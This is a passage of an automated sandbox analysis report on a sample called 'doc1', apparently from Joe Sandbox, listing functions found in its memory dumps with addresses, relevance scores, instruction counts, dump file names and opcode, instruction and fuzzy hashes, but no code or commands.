                            • Instruction Fuzzy Hash: A6810374E05208CFDB14EF69D488BADBBFAFB89344F509069D909E7694DB349981CF04
                            Function 058112A8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 9e0be192cbbcd4a10ec2f19fded22d491409e718892134be2a941b8b9162720b
                            • Instruction ID: 927935d9f88b2119b572806539a4f4f05cca6f8d70219bca26dbb2e2ef12ad0a
                            • Opcode Fuzzy Hash: 9e0be192cbbcd4a10ec2f19fded22d491409e718892134be2a941b8b9162720b
                            • Instruction Fuzzy Hash: 8E71F374E04208CFDB54EFA9D488BADBBF6FB89344F509069D919E7294DB309886CF04
                            Function 05760040 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: '$@
                            • API String ID: 0-1165437249
                            • Opcode ID: a4927c0a2fc957841d4d620541c46094f3e178ad561e5668f5bffdc4973c9ba4
                            • Instruction ID: b963d084e1e54aca3749b391967827294f7b3dcbc93d8219985628466a7179c1
                            • Opcode Fuzzy Hash: a4927c0a2fc957841d4d620541c46094f3e178ad561e5668f5bffdc4973c9ba4
                            • Instruction Fuzzy Hash: FE318C75E056188BDB5CDF2B8C4969AFBF7AFC9300F14C1FA880CA6214DB3049859F40
                            Function 05A80040 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B$
                            • API String ID: 0-3862977591
                            • Opcode ID: e2b5f41413bf504f9d44f4d96bc7b98efc7922a5280f34be13bda9ba70ad1b23
                            • Instruction ID: e7a63d821540b7987c3094618ad12644abb16596375e70942e691aefc7bff47c
                            • Opcode Fuzzy Hash: e2b5f41413bf504f9d44f4d96bc7b98efc7922a5280f34be13bda9ba70ad1b23
                            • Instruction Fuzzy Hash: 3131DB71E096199BEB28DF6AC84869ABBF7BFC9300F10C1A9D419A7254DB305989CF01
                            Function 0581E4D9 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: dcc4f80cfee2ecebfda1810382d9734abb4c61f1a70ddb5f3fa3da56a62894cb
                            • Instruction ID: 5dde50002d5ab76b16778081e0d50e72be680061e7f37506a0f32855a696993e
                            • Opcode Fuzzy Hash: dcc4f80cfee2ecebfda1810382d9734abb4c61f1a70ddb5f3fa3da56a62894cb
                            • Instruction Fuzzy Hash: 6DB12874E05208CFDB14DFA5D498BEDBBBAFB89304F109069D81AA7295EB305C85CF45
                            Function 0581E4E8 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: c45b9f66c12c6a28f08986d9f8a5c6340f38900bc1bd9bbb74ec7e9ea35a69af
                            • Instruction ID: 96bdf59f3a92771d597f584127b4418b9e908e68dd693f43e5cc3657b7cfed82
                            • Opcode Fuzzy Hash: c45b9f66c12c6a28f08986d9f8a5c6340f38900bc1bd9bbb74ec7e9ea35a69af
                            • Instruction Fuzzy Hash: 75A10674E05208CFDB14DFA5D498BEDBBBAFB89304F109469D80AA7295EB305C85CF45
                            Function 057F3BD8 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f4db2ec59191224199d30b552aeb621139887db79824700397e834b8c60cc540
                            • Instruction ID: d908e34a77724d2fe9bf137c9674f5fe68ac1bbe3edb74d85e8b57743caad67f
                            • Opcode Fuzzy Hash: f4db2ec59191224199d30b552aeb621139887db79824700397e834b8c60cc540
                            • Instruction Fuzzy Hash: BE712374E04208CFDB14DFA9D844BEDBBB2FB89304F20A869D519A7395DB34598ADF40
                            Function 057F3BC8 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 2866b90415b55ecd207c37c47ffd3be1daf9fe99cf2f60391630ebfcf5023c6c
                            • Instruction ID: 5f1357e01053574803812442fa3fbbcb0782fc06b570b7dd4a1d514097c50041
                            • Opcode Fuzzy Hash: 2866b90415b55ecd207c37c47ffd3be1daf9fe99cf2f60391630ebfcf5023c6c
                            • Instruction Fuzzy Hash: D5812474E04208CFDB14DFA9D844BEDBBB2FB89304F209869D119A7395DB34598ADF40
                            Function 0576C5B6 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: v
                            • API String ID: 0-1801730948
                            • Opcode ID: 5143da0ed9163b750b9008140e12bd99cc14c4d04ff2a46c95d9f6c7fbf03b69
                            • Instruction ID: 5a3ba95b062fcde208971c239f13147df922eb06870dce4c0d073cda4b693626
                            • Opcode Fuzzy Hash: 5143da0ed9163b750b9008140e12bd99cc14c4d04ff2a46c95d9f6c7fbf03b69
                            • Instruction Fuzzy Hash: FA613D74E1466C8FEB60CFADC984B8DBBF1BB48315F6481A9D418E7606D330AA95CF05
                            Function 05760007 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: e231f974f7c97de4571dd3fbb39d93e0ec6af36c3cd4f4c3f3298daafbc23582
                            • Instruction ID: 08c99dbb6a0ec2c94530739554badb43b9e106d7b02b416fa7ba8b16549e3c73
                            • Opcode Fuzzy Hash: e231f974f7c97de4571dd3fbb39d93e0ec6af36c3cd4f4c3f3298daafbc23582
                            • Instruction Fuzzy Hash: 2731E176D056588FDB19CF278C0929ABBF7AFC5300F19C0FAC44CAA265DA3449859F51
                            Function 05A80006 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B
                            • API String ID: 0-1255198513
                            • Opcode ID: 0f2d958cfa1fc03665c94eefc6946d801949db45cc30d1c3f96120f6eea62a9a
                            • Instruction ID: 823d033c67133c14a0ef2f418f48322148a5168263fdad8999a8a4d938f952b6
                            • Opcode Fuzzy Hash: 0f2d958cfa1fc03665c94eefc6946d801949db45cc30d1c3f96120f6eea62a9a
                            • Instruction Fuzzy Hash: 5B313E71D093559FDB19CF7B98486D9BFF2AF85200F14C1FAD448AB261DA340989CF11
                            Function 01069AC8 Relevance: 1.0, Instructions: 983COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d19698f0cbd038c533b2d8dbaceda31656f68ea2b3e3547a80c6bc2b5b2958e5
                            • Instruction ID: fa606466546ba3379c47a80ed5c44d309bc0e062ac8dc711fdb7d6b7a50c30ee
                            • Opcode Fuzzy Hash: d19698f0cbd038c533b2d8dbaceda31656f68ea2b3e3547a80c6bc2b5b2958e5
                            • Instruction Fuzzy Hash: B0A2C375A00228CFDB64DF69C884AD9BBB2FF89304F1581E9D549AB365DB319E81CF40
                            Function 057654A0 Relevance: .4, Instructions: 431COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f48ec4a085c5ccc10eb63a6cd0b067660566cf7c0031f16af005d89fd55decb8
                            • Instruction ID: c10ff52844c339f13a767f2ef351fde66a5bb4f9df8c77a0d6a4e9134a9255c2
                            • Opcode Fuzzy Hash: f48ec4a085c5ccc10eb63a6cd0b067660566cf7c0031f16af005d89fd55decb8
                            • Instruction Fuzzy Hash: C712B470E046189FDB14CFAAC98069DFBF2FF88304F64C169D858AB21AD734A946DF50
                            Function 057E1770 Relevance: .3, Instructions: 335COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f08b483fc18fc77b38e6555b622fd5b78ed2ff7b21d87ae4a15fdd0fe7fe66ed
                            • Instruction ID: e7fd3d526c6fc11f5886a68c4e5e87fe5913a8c361fa5bde497a16e4b16f11f5
                            • Opcode Fuzzy Hash: f08b483fc18fc77b38e6555b622fd5b78ed2ff7b21d87ae4a15fdd0fe7fe66ed
                            • Instruction Fuzzy Hash: 74D10834A00605CFDB14DF69C589AAABBF2BF88314F65C5A9E5069B361D730EC81DB50
                            Function 0576FA90 Relevance: .2, Instructions: 242COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a2e073abcbb4b8f1d796a11db5f313c0bb24a67643f6331a092374fe0638db2
                            • Instruction ID: 9d9508e367658e517095e2295448e43932019ec5bf7e829b7976b08d093e17cf
                            • Opcode Fuzzy Hash: 1a2e073abcbb4b8f1d796a11db5f313c0bb24a67643f6331a092374fe0638db2
                            • Instruction Fuzzy Hash: 4BA1B874E05218CFEB24CF69E855BADBBF2BF89300F2490A9D80DA7259DB705985DF04
                            Function 0576FA81 Relevance: .2, Instructions: 236COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2bdbaab69c825dbe8632518052d907f410195c03b8a93487ef9fb996c84cf2c
                            • Instruction ID: 812f05c412edf0c746bbfd0caab44f1aea8513e020801b46b73881d5814f51db
                            • Opcode Fuzzy Hash: d2bdbaab69c825dbe8632518052d907f410195c03b8a93487ef9fb996c84cf2c
                            • Instruction Fuzzy Hash: FDA1CA74E05258CFDB24CF69E855BADBBF2BF89300F2490A9D809A7259DB705985DF00
                            Function 05A9CE98 Relevance: .2, Instructions: 177COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c2d84d178e08b5e8bab84162af709e957385211a7684db87c2744dfa841e2245
                            • Instruction ID: 0f64a0c04858f9313e9727b32c7a8b0df5adf151a205f121852802f495e43fef
                            • Opcode Fuzzy Hash: c2d84d178e08b5e8bab84162af709e957385211a7684db87c2744dfa841e2245
                            • Instruction Fuzzy Hash: C78128B4A01218DFDB58DF68D865BADB7F2FB49310F0081A9D41AA7394DB35AE85CF01
                            Function 010658E1 Relevance: .2, Instructions: 169COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aff2f2b1b4da16f8428b458e6e37ea4f626fa2158395ddbc561c10b01ed7d981
                            • Instruction ID: 007aebad63dc4080d657ee11279f7cb97775295dd9c71fa405b70e3231083330
                            • Opcode Fuzzy Hash: aff2f2b1b4da16f8428b458e6e37ea4f626fa2158395ddbc561c10b01ed7d981
                            • Instruction Fuzzy Hash: EB71FC74E012459FDB09EF7BE85079ABBF2FBC8304F14C13AD105AB2A9EB7559468B40
                            Function 010658F0 Relevance: .2, Instructions: 165COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 837c535fdc08339e4ee171402e55b1281f59a633a9a39aef435c581ee143f3b8
                            • Instruction ID: d2ba8018ef4c83a1b39c6909a84214619afd01cbec7926159699e2c0d17a80d7
                            • Opcode Fuzzy Hash: 837c535fdc08339e4ee171402e55b1281f59a633a9a39aef435c581ee143f3b8
                            • Instruction Fuzzy Hash: C471FD74E012459FDB09EF7BE85079ABBF7FBC8304F14C12AD005AB2A9EB7159468B50
                            Function 05800007 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b3aaf2823ade8b0491acad17bbc9ea314ccbd1d6e3cd78d004b17de4f5123a9
                            • Instruction ID: a1da258dc495e91fbfa15fa11804984bffcb24638789af1b58f4601a6bb3fccd
                            • Opcode Fuzzy Hash: 5b3aaf2823ade8b0491acad17bbc9ea314ccbd1d6e3cd78d004b17de4f5123a9
                            • Instruction Fuzzy Hash: 3E516D71D056598BE769CF278D047DAFAF3AFC9300F04C1FA944CA6265EB740A869F41
                            Function 05765492 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff799fe8ac603c45fe6ff4b4f4b9356e9174b4b26f647c71f93c385c99ef2611
                            • Instruction ID: 35baa944d1ad02e425233ade9213eb948c3946b889acbff27004af7835e08bd8
                            • Opcode Fuzzy Hash: ff799fe8ac603c45fe6ff4b4f4b9356e9174b4b26f647c71f93c385c99ef2611
                            • Instruction Fuzzy Hash: 154156B5E006199BDB18CFABC94069EFBF3BFC8300F14C17AD918AB224DB3059469B54
                            Function 057F8690 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 438e2df3a41cd09d71f488cce93cb76f177fef85498a3058b0d0d714dcd2938d
                            • Instruction ID: 50c55051929d3fc11ede7f97283d16ec79199b2e6f740237ee3b91a1299a4c55
                            • Opcode Fuzzy Hash: 438e2df3a41cd09d71f488cce93cb76f177fef85498a3058b0d0d714dcd2938d
                            • Instruction Fuzzy Hash: 4B51D0B0D05218CFEB18CFAAC944B9DBBF2BB89300F1080AAD509BB354D7745985DF22
                            Function 0580D2D8 Relevance: .1, Instructions: 114COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 843d5e6f773dc72605acee6c61a3dc08aab22fb83e1c2b61c5d7887008c2d391
                            • Instruction ID: 3b09fdd0cc98221abf512ac25fb6ce8f863fa9cf27b28321ff18e6848a03d4e0
                            • Opcode Fuzzy Hash: 843d5e6f773dc72605acee6c61a3dc08aab22fb83e1c2b61c5d7887008c2d391
                            • Instruction Fuzzy Hash: A941EEB0D053489FDB50CFA9C885AAEBBF1BB09300F20A029E814AB290D7749885CF45
                            Function 057F8680 Relevance: .1, Instructions: 113COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7d73a50f9d6d3ddf7c35dff9eb8aa60218fdf8541b4777395ce169d4dfb56767
                            • Instruction ID: 03c1198478194b33d5b2acaf8a7a1d76ca1d78c753ea3b388d5373a45f1c428d
                            • Opcode Fuzzy Hash: 7d73a50f9d6d3ddf7c35dff9eb8aa60218fdf8541b4777395ce169d4dfb56767
                            • Instruction Fuzzy Hash: 2F41CFB1E05218CFEB18CF9AD944BDDBBF2BB89314F1480AAD508AB354D7744985CF22
                            Function 05800040 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7eef042a08b1f684cc66860263fce3c5df7d28078d4f30206fa87774d79d8a68
                            • Instruction ID: fc1c1527e2f84ab5a55e6acf3ab50653618ddb4845f66bf81c3706d8413b54b4
                            • Opcode Fuzzy Hash: 7eef042a08b1f684cc66860263fce3c5df7d28078d4f30206fa87774d79d8a68
                            • Instruction Fuzzy Hash: C1512471D056598BEB6CCF278D047DAF6F7AFC9300F04C1FA985CA6254DB740A859E41
                            Function 05766F68 Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d492ba3dc4f7428c7bacd4a2e496ab3435f8a774ec103af1ef4d7a39fd49d6f
                            • Instruction ID: 27143be9e9c48daf0fba7610582bcf62ed7a845bb4522eb04ac3a04cba584c25
                            • Opcode Fuzzy Hash: 1d492ba3dc4f7428c7bacd4a2e496ab3435f8a774ec103af1ef4d7a39fd49d6f
                            • Instruction Fuzzy Hash: E7414071E05A188BEB1CCF6B8D4169EFAF3AFC9301F18C1B9880CAA265DB3045469F11
                            Function 057FF3A0 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 377899b70dfb4033048d8bff1460758febcee342e7da0dbf6d04989dab803e70
                            • Instruction ID: a38779b81b57c0a9836d40ee7bde1a210b4f13bbb4093c8ec173dd58c1405426
                            • Opcode Fuzzy Hash: 377899b70dfb4033048d8bff1460758febcee342e7da0dbf6d04989dab803e70
                            • Instruction Fuzzy Hash: 7041BBB5D05258DFDB00CFA9D484AEEFBF5AB49310F24906AE415B7240C738AA45DFA8
                            Function 057FF398 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02a8ef0548f51596f23cb4e9a2dcf18c8d2827af709d864b4a7baf5cd80ba859
                            • Instruction ID: 3ab313a90e40e716c8f4f7c6f555dbfb0ec9ee1bfa81edfc9ecd3b21aa001adc
                            • Opcode Fuzzy Hash: 02a8ef0548f51596f23cb4e9a2dcf18c8d2827af709d864b4a7baf5cd80ba859
                            • Instruction Fuzzy Hash: 1D41CBB5C05259DFDB00CFA9D581AEEBBF0AF49310F24946AE415B7240C738AA45DF64
                            Function 01066340 Relevance: .1, Instructions: 80COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df65c4178e4cba81ed161422cc2110895e50787bf7b26f5b3091253c76f46601
                            • Instruction ID: 53f587f78bc745b11af9b57f224cacabedcf44bfe27b8ede84f9d17e0625e068
                            • Opcode Fuzzy Hash: df65c4178e4cba81ed161422cc2110895e50787bf7b26f5b3091253c76f46601
                            • Instruction Fuzzy Hash: 143197B1D016188BEB28CF6BC95878EFAF7BFC9304F14C1A9C44CA6254DB7509858F11
                            Function 0580E810 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac66f2faf37c99490d56920091231b1ea4bad8246bb91654ae7c89c1f91d528f
                            • Instruction ID: eea5eadc339a363430b1a9c92e95b7493b488a270c35ef5cdbef24c0da10ba69
                            • Opcode Fuzzy Hash: ac66f2faf37c99490d56920091231b1ea4bad8246bb91654ae7c89c1f91d528f
                            • Instruction Fuzzy Hash: 8831C471D052288BEB68CF6ACD446DEBBF6AF89300F14C4AAD80DA7254DB714A85CF40
                            Function 057FB1A0 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b53d26047f50cce9899f9d9418bb0989c9f3539e42c7f587e7dc00f99a2b5502
                            • Instruction ID: 6f10460a7c1f0606d9f96d49785e15c4e97dd14516841fe0ece2649c54edd534
                            • Opcode Fuzzy Hash: b53d26047f50cce9899f9d9418bb0989c9f3539e42c7f587e7dc00f99a2b5502
                            • Instruction Fuzzy Hash: 6621C7B1D046198BEB28CFABC844BEEFBF6AF88300F14C17A8519A7355EB7449459F50
                            Function 057FAB33 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31d45df5ddac1c9db111ce9c6210a431b47e1531c702df23cad88ab6fbc1e3e1
                            • Instruction ID: a7ffea4943adc9c1cfe8265ce993a3a88bc89899576776ec7f1fc975e4c811a8
                            • Opcode Fuzzy Hash: 31d45df5ddac1c9db111ce9c6210a431b47e1531c702df23cad88ab6fbc1e3e1
                            • Instruction Fuzzy Hash: F021DCB5C042089FDB10CFA9D981AEEFBF5BB49310F14902AE919B7310C735A905CFA4
                            Function 01066332 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29a270bd13f3ca7af06a334bb38cf5db8a37cc5fadbad66ef67d6853e1df4555
                            • Instruction ID: 7b692373abdb552a672d217a8cfe371b9b10693a5ce4461b5e476745b57074e6
                            • Opcode Fuzzy Hash: 29a270bd13f3ca7af06a334bb38cf5db8a37cc5fadbad66ef67d6853e1df4555
                            • Instruction Fuzzy Hash: 313188B1D016188BEB18CF6BC84578EFAF7BFC9304F14C1A9C44CAA264DB750A858F51
                            Function 057FAB38 Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 429ed8bf4a7bd43a7e6e28445253b0359ad8b385b670a95b7b80de325fbf0b9d
                            • Instruction ID: e423169bb4e6686df222b7a191b02ebf280c01cbf7dc05cacee7c805c5ddd90b
                            • Opcode Fuzzy Hash: 429ed8bf4a7bd43a7e6e28445253b0359ad8b385b670a95b7b80de325fbf0b9d
                            • Instruction Fuzzy Hash: 6221DCB5C042089FDB10CFA9D981AEEFBF5BB49310F14902AE919B7210C7356901CFA4
                            Function 05760152 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$O$p$
                            • API String ID: 0-3015175914
                            • Opcode ID: 4c3791e843631edd065716f1812cf2c0c5fcdb9c8fe5cf563e31bef9d6290ac8
